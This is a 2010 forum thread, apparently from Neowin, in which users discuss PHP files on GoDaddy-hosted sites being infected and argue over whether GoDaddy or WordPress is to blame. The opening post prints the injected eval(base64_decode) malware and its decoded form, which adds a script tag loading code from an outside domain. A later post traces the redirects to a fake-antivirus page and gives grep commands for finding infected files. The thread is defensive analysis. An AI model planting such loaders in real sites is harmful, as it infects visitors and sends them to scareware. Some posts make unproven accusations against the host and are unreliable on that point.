GoDaddy Got Hacked Yesterday

[TonyLock]

I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/GoDaddy/status/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:

<script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>

When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

When you decode this, it equates to:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;
	if(!function_exists('mrobh')){
		if(!function_exists('gml')){
			function gml(){
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
				}
				return "";
			}
		}
        if(!function_exists('gzdecode')){
			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
      				$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
       				$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
       				$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
       			}
    			if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
      				$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
				if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
					$RBE4C4D037E939226F65812885A53DAD9+=2;
      			}
      			$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
      			if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
      				$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
      			}
      			return $R034AE2AB94F99CC81B389A1822DA3353;
     		}
		}
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
			if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
				return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			}else{
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}
		ob_start('mrobh');
	}
}

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.

[Cupcakes]

Hosting companies always love to jump on the Wordpress bandwagon as the reason for any security vulnerbilities.

http://wordpress.org/development/2010/04/file-permissions/

[TonyLock]

I know! My friend doesn't even use WordPress.

[HawkMan]

God Hacking

that's some serious business

[itzwolf]

Dang, first I've heard of this...

[Cupcakes]

Yay I love that someone was so quick to jump on the bandwagon: https://www.neowin.net/news/wordpress-on-godaddycom-hacked

Again, GODADDY is the one that's at fault NOT WORDPRESS. Yes, outdated Wordpress installs can reek havoc but if you read the above link in my other post, it's going to revolve around the SERVERS LACK OF SECURITY.

[hotdog666al]

Yay I love that someone was so quick to jump on the bandwagon: https://www.neowin.net/news/wordpress-on-godaddycom-hacked

That's extremely annoying to see on the front page. :pinch:

[TonyLock]

This absolutely needs to be in th front page. However, it should be stated that it absolutely was not the fault of WordPress as claimed by GoDaddy.

No software should be blamed for the incompetency of a hosting company.

It was not a weak password issue, or a FTP key logger as GoDaddy just told my friend.

It was GoDaddy's lack of adequate security.

Perhaps GoDaddy has some legal issues here and so not to get their butts sued, they blame some software that's not even on their servers.

[Andrew Lyle Global Moderator]

That's extremely annoying to see on the front page. :pinch:

You have to read:

www.twitter.com/GoDaddy and read all the complaints

and

http://community.godaddy.com/groups/go-daddy-hosting-connection/forum/topic/wordpress-compromisedhhow-to-fix-it/?isc=smtwsup

GoDaddy understands its usually WordPress or weak FTP passwords.. With the amount of reports, this appears to be WordPress on GoDaddy servers.

[Singh400]

Any coding gods tell us what the quoted codes do? Out of sheer interest...

[Andrew Lyle Global Moderator]

Here is another report:

http://wordpress.org/support/topic/394255

Just google:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

I have to be clear, nobody knows 100% what the cause is, but WordPress owners appear to be getting hacked, aside from the odd post here on Neowin, claiming that friends got hacked, without wordpress installed.

But we can all safely say that GoDaddy is the host of all these compromised websites, correct?

[Cupcakes]

A server-wide occurrence is the fault of GoDaddy and not Wordpress (as expressed by seeing this issue with non-Wordpress accounts on effect GoDaddy servers.) Not only that but people also fail to understand to bring up any Wordpress plugins that they're using. Those can be the culprit and not even Wordpress itself.

Andrew, even in the Wordpress support link, you can also see that another user chimes in that it's not Wordpress-specific: http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html

Summary: A web host had a crappy server configuration that allowed people on the same box to read each others? configuration files, and some members of the ?security? press have tried to turn this into a ?WordPress vulnerability? story.

WordPress, like all other web applications, must store database connection info in clear text. Encrypting credentials doesn?t matter because the keys have to be stored where the web server can read them in order to decrypt the data. If a malicious user has access to the file system ? like they appeared to have in this case ? it is trivial to obtain the keys and decrypt the information. When you leave the keys to the door in the lock, does it help to lock the door?

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

I?m not even going to link any of the articles because they have so many inaccuracies you become stupider by reading them.

If you?re a web host and you turn a bad file permissions story into a WordPress story, you?re doing something wrong.

P.S. Network Solutions, it?s ?WordPress? not ?Word Press.?

[RoomKid]

I've been hacked once too, there was this file encoded in Base64. To access the file, you need a password. So I opened that file in cPanel, and found out the password. When I got access, I was amazed. It was like a filemanager, I can edit/delete/create new files. There were hacking tools too. I deleted it, changed my passwords and everything else to make sure that I was safe.

[bytes2000]

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

I have further checked the script via: http://web-sniffer.net/ and if you are not the Google Bot or YahooBot...

it redirects to: http://www4.suitcase52td.net/?p=p52dcWpkbG6Hnc3KbmNToKV1iqHWnG2eXsmYlGibZZqXlw%3D%3D

It creates 7 cookies:

HTTP Response Header

Name Value Delim

Status: HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Mon, 03 May 2010 02:58:33 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

X-Powered-By: PHP/5.2.12

Set-Cookie: cid=1; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: uid=2045; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: bid=b_Unknown; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: ls=107; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: pid=3; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: pid_3=1; expires=Tue, 04-May-2010 02:58:33 GMT

Set-Cookie: ls_3_107=1; expires=Tue, 04-May-2010 02:58:33 GMT

And then redirects you to:

and then it redirects you via HTTP 302 code to: http://www1.safetypcwork5.net/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKith6Swz9KwoFqbnZxxmpi2m8/UoKebWqas0GqaYZaaXprIlpVpaFzY1cStp6d2ZV6ldV/VltjSlm1TmpukyWqIppnLpKCKzKF0Y26dj5xsYGVpYm1qXqvGk6HOpaSdbmFn25LEXaPUlsnKyKNloJvZkImtpXFqZm9mcG6WZJafV6SgZm9plmSUaGWbZJWdiZSab3qqh9qilnFxbXA=

and then it finnally redirects you to a page with the following content:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><meta http-equiv="Content-Language" content="en"/><meta http-equiv="Cache-control" content="Public"/><title>Security Threat Analysis</title><link rel="icon" href="http://www.google.com/favicon.ico"/><link rel="SHORTCUT ICON" href="http://www.google.com/favicon.ico"/>


  <style type="text/css" media="screen">
    #loading {
      height:auto;
      left:45%;
      padding:2px;
      position:absolute;
      top:40%;
      z-index:20001;
    }
    #loading a {
      color:#225588;
    }
    #loading .loading-indicator {
      -x-system-font:none;
      background:white none repeat scroll 0 0;
      color:#444444;
      font-family:tahoma,arial,helvetica;
      font-size:13px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:bold;
      height:auto;
      line-height:normal;
      margin:0;
      padding:10px;
    }
    #loading-msg {
      -x-system-font:none;
      font-family:arial,tahoma,sans-serif;
      font-size:10px;
      font-size-adjust:none;
      font-stretch:normal;
      font-style:normal;
      font-variant:normal;
      font-weight:normal;
      line-height:normal;
    }
  </style></head><body>
  <div id="loading" style="display:block"><div class="loading-indicator"><img height="50" width="50" style="margin-right: 8px; float: left; vertical-align: top;" src="Images/loading.gif"/><br/><span id="loading-msg">Initializing process.</span></div></div>
<script type="text/javascript" src="107a447c72270a52ae79e796c983523e3a563008911.js"></script>
</body></html>

Good! my Symantec Endpoint antivirus blocked something and I cannot access: www1.safetypcwork5.net so I will continue investigating via web-sniffer

That page, shows a loading image and loads the following javascript code: http://www1.safetypcwork5.net/107a447c72270a52ae79e796c983523e3a563008911.js

I did not post the whole code since it would detect a virus in this thread

basically it opens a fake system alerts like the following:

["To prevent damage to your computer, use CANCEL.","C"],["Your system is at risk of crash. Press CANCEL to prevent it.","C"],["Your system has been damaged due to recent virus attack. Press 'OK' to to fix it.","O"],["To improve performance of your PC press 'OK'.","O"],["Your PC is working slowly. Press 'OK' to check it.","O"]

I did not further check the complex javascript of this, but it is 1000% Malware... and I think this was caused by a Worm or maybe a virus exploting unpatched WP installs and not really brute forcing for weak passwords, because I think brute forcing is used mainly when they set your site as the target but we cannot tell if that worm affected the WP install, so its better to reinstall and continue using (if not already) safe passwords.

[GoDaddy]

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK.'>http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .

^Salem

[Cupcakes]

Rather than asking for examples, has there been any proactive response to yanno, search and clean GoDaddy's OWN servers? It would kind of make sense that a GoDaddy tech would ensure the security of the server by searching for any affected accounts on there and if GoDaddy has a clause in their Terms of Service that they don't resolve any malware issues on the client's account, at least notify the client with a support ticket referencing to them what they need to do for the safety of their account.

You can easily run an SSH command to find some of the "core" malware files and/or content itself.

[Andrew Lyle Global Moderator]

TonyLock and All,

I work on Go Daddy's Social Media Team and we're working with our Security Operations Center to locate examples of non-WordPress sites that have been compromised. If you're comfortable with sharing example domains, please feel free to PM them to me.

Please know that we're actively working to identify the issue and resolve it. Further, we've published steps to correct the issue at http://fwd4.me/MFK.'>http://fwd4.me/MFK. As we continue to investigate the matter, our Security Team has noted that reports of sites with this malware that were not WordPress blogs have the commonality that an outdated version of WordPress is either powering part of the site or that it is not in use, but is still present on the hosting plan. Additionally, we have heard reports of the compromise occurring on other hosting providers.

Again, we are actively and aggressively working to identify the cause and we've published a means to correct it - http://fwd4.me/MFK .

^Salem

Thank you for coming here to Neowin and posting that Salem :yes: Much appreciated to put our members minds at ease.

[bytes2000]

Rather than asking for examples, has there been any proactive response to yanno, search and clean GoDaddy's OWN servers? It would kind of make sense that a GoDaddy tech would ensure the security of the server by searching for any affected accounts on there and if GoDaddy has a clause in their Terms of Service that they don't resolve any malware issues on the client's account, at least notify the client with a support ticket referencing to them what they need to do for the safety of their account.

You can easily run an SSH command to find some of the "core" malware files and/or content itself.

I have not created scripts for over half a year since I quit my job.. but I think on linux it could be something like this:

#step 1, enter the path where the websites are hosted, it should be something like:    cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find & grep
find . 2>/dev/null | xargs grep -i script | grep -i php

then just analyze the output of the script for something strange (using a remote javascript -from other domain-)

but if you will be only searching for WP installs trying to connect to: kdjkfjskdfjlskdjf.com you may want to try..

#step 1, enter the path where the websites are hosted, it should be something like:  cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find & grep
find . 2>/dev/null | xargs grep -i kdjkfjskdfjlskdjf

Those 2 are not the best scripts for this, but those should do the job. Good luck

[TonyLock]

It is not our job to provide tech support to GoDaddy. It is GoDaddy's job to provide security to it's customers.

Recently, GoDaddy gave away $100,000 in cash prize money to a competition winner, as a means of advertising. If they can afford to give a way a tenth of a millions dollars (USD) in cash to random members of the public, then surely they have enough money to hire a single security expert who can actually tell the server crew at GoDaddy what a crappy job they've done so far.

Update: I've just had a good friend from England email me about a similar issue with GoDaddy.

It bother's me that such a seemingly good company can allow your data's security to be compromised so easily and then just blame something else to not get their butts sued.

@Salem (of GoDaddy)

It's funny you have to come here and be an apologetic for GoDaddy. Get your act together before you have a class action law suit on your hands.

------------------

@bytes2000

I have not created scripts for over half a year since I quit my job.. but I think on linux it could be something like this:

#step 1, enter the path where the websites are hosted, it should be something like:    cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find & grep
find . 2>/dev/null | xargs grep -i script | grep -i php

then just analyze the output of the script for something strange (using a remote javascript -from other domain-)

but if you will be only searching for WP installs trying to connect to: kdjkfjskdfjlskdjf.com you may want to try..

#step 1, enter the path where the websites are hosted, it should be something like:  cd /home/UsersWebsitesAreUnderThisDirectory/
#ste 2, use the find & grep
find . 2>/dev/null | xargs grep -i kdjkfjskdfjlskdjf

Those 2 are not the best scripts for this, but those should do the job. Good luck

We should not have to provide this code to GoDaddy. They have administrators who get paied for this. Ask for money since they are obviously looking at this thread and will no doubt be using your code.

[bytes2000]

It is not our job to provide tech support to GoDaddy. It is GoDaddy's job to provide security to it's customers.

Recently, GoDaddy gave away $100,000 in cash prize money to a competition winner, as a means of advertising. If they can afford to give a way a tenth of a millions dollars (USD) in cash to random members of the public, then surely they have enough money to hire a single security expert who can actually tell the server crew at GoDaddy what a crappy job they've done so far.

Update: I've just had a good friend from England email me about a similar issue with GoDaddy.

It bother's me that such a seemingly good company can allow your data's security to be compromised so easily and then just blame something else to not get their butts sued.

@Salem (of GoDaddy)

It's funny you have to come here and be an apologetic for GoDaddy. Get your act together before you have a class action law suit on your hands.

------------------

@bytes2000

We should not have to provide this code to GoDaddy. They have administrators who get paied for this. Ask for money since they are obviously looking at this thread and will no doubt be using your code.

Yes but, I care because 7 of my sites are hosted on Godaddy (currently none of them were altered) , I like all the stuff related to IT security and I currently have no job, so this is my spare time. Also.. I Dont think if they pay people for system administrators they have all the neccesary knowledge! I worked for the world leader in computer sales in the support area and I had more knowledge than some of the administrators.

Haha you are right, if they need help they can use Google or give some rewards, but I'm always willing to give my advice :p Im not an expert but I have some experience and creativity, which sometimes is helpful.

[TonyLock]

Just caught GoDaddy spying on me, just as I had suspected.

This screenshot is of my profile as of 12:23 AM PDT. Look who is spying on me and on this thread at 10:27 PM rather than fix the security holes in their servers:

GoDaddy specifically made their Neowin account to comment on this thread and to address me directly. Clearly they are worried and don't have a clue what is going. Funny actually.

[Andrew Lyle Global Moderator]

Because they clicked on your

profile, they are spying on you?

It isn't who is looking at your profile right now, but who did click on your profile last.

I think you are way over reacting. GoDaddy is just trying to clear their name, and because your friends got hacked, you seem to take this personally against GoDaddy, as if they were the ones behind this.

You are making this situation much worse than it has to be. And threatening them with a lawsuit? Please! You already said your friends got hacked, and not you personally. I also don't like your attitude towards the GoDaddy member. He posted a reply to help the situation and you blew up at him for taking his time and coming here to post this.

Sickening, and I think you owe him an apology.

[kjx]

Just caught GoDaddy spying on me, just as I had suspected.

So they checked your profile out. They didn't bother to hide their identity behind a fake account, did they? Relax..

If I followed your logic, I'd better be worried because on 24th April my profile was viewed by a profile named asda (likely random - check the position of those letters on the keyboard) created on the same day, filled with no information and that seems to be the only thing that profile has done on neowin (visit my profile). If I'm lucky, it's only someone who wanted to mark me down anonymously (star rating). If not, somebody is harvesting information about me, or performing background checks. There's nothing I can really do about it.

On topic, I have GoDaddy accounts but none of my php files seem to have been compromised.

[zyxwvut]

My Godaddy site just got hacked also. It is just a simple PHP site, mostly html with .php page extensions. All the php files were hacked. Godaddy is in an extreme state of denial. They just sent a form email implying that it was somehow my fault. Definitely not just a Wordpress problem.

[TonyLock]

Because they clicked on your

profile, they are spying on you?

It isn't who is looking at your profile right now, but who did click on your profile last.

I think you are way over reacting. GoDaddy is just trying to clear their name, and because your friends got hacked, you seem to take this personally against GoDaddy, as if they were the ones behind this.

You are making this situation much worse than it has to be. And threatening them with a lawsuit? Please! You already said your friends got hacked, and not you personally. I also don't like your attitude towards the GoDaddy member. He posted a reply to help the situation and you blew up at him for taking his time and coming here to post this.

Sickening, and I think you owe him an apology.

Apology? How old are you son? Apology for speaking the truth? Only on Neowin!

Thereal issue is responsibility.

GoDaddy is refusing to accept responsibility, because they know as soon as theystop blaming WrodPress and state the truth that they themselves failedto provide the minimalist of reasonable security, they will get theirbutts sued! So GoDaddy is desperately looking for a way out. Sofar, WrodPress is their scapegoat but despite WrodPress's failings, any true technologist knows the account management systemset up by GoDaddy it the one who is truly at fault here and not WordPress. If aclass action law suit were to be filed, any 10 year old with alittle knowledge of UNIX could prove the fault is withGoDaddy and not WordPress. That's why you can see they have tried hard thisweekend to bury this matter.

If you read a great many other tech forums, you'll see that others are also lookingin to a class action law suit. Thank God I don't host with GoDaddy or I wouldcertainly sue them for allowing my website to become vulnerable under theircare.

Kindly don't make this about me vs GoDaddy, it's about people vs GoDaddy.

• GoDaddy, by their own incompetence have enabled hackers to access other accounts on their servers, distribute viruses via all of our websites and have possibly allowed the same hackers to have access to restricted data on the servers, not to mention the databases.
• It's evident that GoDaddy, by their own flawed security has become the vehicle for the transpiration of internet viruses.
• GoDaddy lied about the attack publicly (knowingly lied and also were vastly economical with the truth).
• GoDaddy blamed people for using WordPress, even though they didn't have WordPress installed on their servers.
• GoDaddy provided a completely useless support page that hardly address the issue and was more of a publicity act to support their blame of WordPress.
• GoDaddy failed to adequately inform their customers of the attack, or advise them proactively what to do.
• GoDaddy failed to restore the infected files.
• GoDaddy failed to adequately inform their tech support staff of the issue.
  • When the GoDaddy tech support staff sought clarification, they themselves were informed the client (all of us) probably had key loggers to track FTP passwords (What utter BS).

  [*]After 2 of my friends and I called GoDaddy to find out what is going on, we were given the run around, and they ask us to help them!?[*]Reading Salem's post, it's clear GoDaddy recorded the conversation with one of my friends, without informing them the phone call was being recorded beforehand. Isn't this an OffCom and also an FCC violation? I was on Skype with my friend while he had GoDaddy on speaker-phone so I heard everything![*]After all of which, GoDaddy followed and address me directly on Neowin just because I brought the issue to the attention of the public. GoDaddy has been hacked before and you never saw them chasing someone down who reported the matter publicly.[*]Then for no reason, 2 hours after making their Neowin account, GoDaddy examines my Neowin profile.

Therefore, as a concerned Neowin member, a possible future GoDaddycustomer (probably not any more though), and a good netizen, I see itperfectly reasonable to raise more questions about GoDaddy, and it'srecent failing. If you don't have any such concerns, then you are obviously onthe payroll of GoDaddy.

If anyone wasn't infuriated by GoDaddie's failings, I'dcall serious doubt in relation to you being a technologist,least a tech forum news reporter.

The bottom line is, GoDaddy needs to do the following:

• Hire experts who know how to lock down user accounts so one account can never have access to another.
• Stop making a bigger fool of themselves by:
  • Making false Tweets about the issue.
  • Stop blaming WordPress, start accepting complete and utter responsibility.
  • Following me around the internet.
  • Asking the public to do their jobs.

  [*]Make a public apology to everyone for their total lack of basic security.[*]Make a public apology to everyone for telling lies about the hack attempt.[*]Make a private apology individually to everyone whose site got infected.[*]Restore all files that have been infected and not just ask the customers to do it.[*]Insure this will never happen again, and offer heavy financial compensation if it does.[*]Insure if such a thing does happens again, they proactively inform the customer immediately.

I hope GoDaddy accept responsibility for it's failing and accepts whatit needs to do to set things right by it's customers.

But if there are back handers going out (as evident by theapologist for the GoDaddy's apologist) then I highly doubt it.

GoFigure GoDaddy!

[HawkMan]

Just caught GoDaddy spying on me, just as I had suspected.

This screenshot is of my profile as of 12:23 AM PDT. Look who is spying on me and on this thread at 10:27 PM rather than fix the security holes in their servers:

GoDaddy specifically made their Neowin account to comment on this thread and to address me directly. Clearly they are worried and don't have a clue what is going. Funny actually.

And seriously, to expand on what andrew said.

The guy asked for what other domains you knew of that had been compromised, you could have provided that here or sent him a pm. instead you came up with another anonymous godaddy friend without wordpress. it could very well be they have unused wordpress files on the server or that wjatever the do use is based on wordpress